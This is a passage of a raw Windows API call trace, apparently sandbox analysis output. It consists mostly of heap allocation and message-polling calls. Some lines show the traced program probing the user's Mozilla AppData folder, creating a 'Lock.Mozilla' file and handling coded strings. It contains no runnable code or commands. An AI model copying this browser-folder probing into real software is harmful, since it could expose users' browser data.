HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0248.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0248.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0248.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0248.291] GetLastError () returned 0x5 [0248.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0248.292] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.292] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.mozilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0248.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0248.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0248.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.294] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0248.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.295] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.296] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.296] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.296] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.296] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.296] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.296] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.297] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.297] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.297] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.297] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.297] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.297] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.297] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.298] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.298] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.298] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.298] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.298] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, 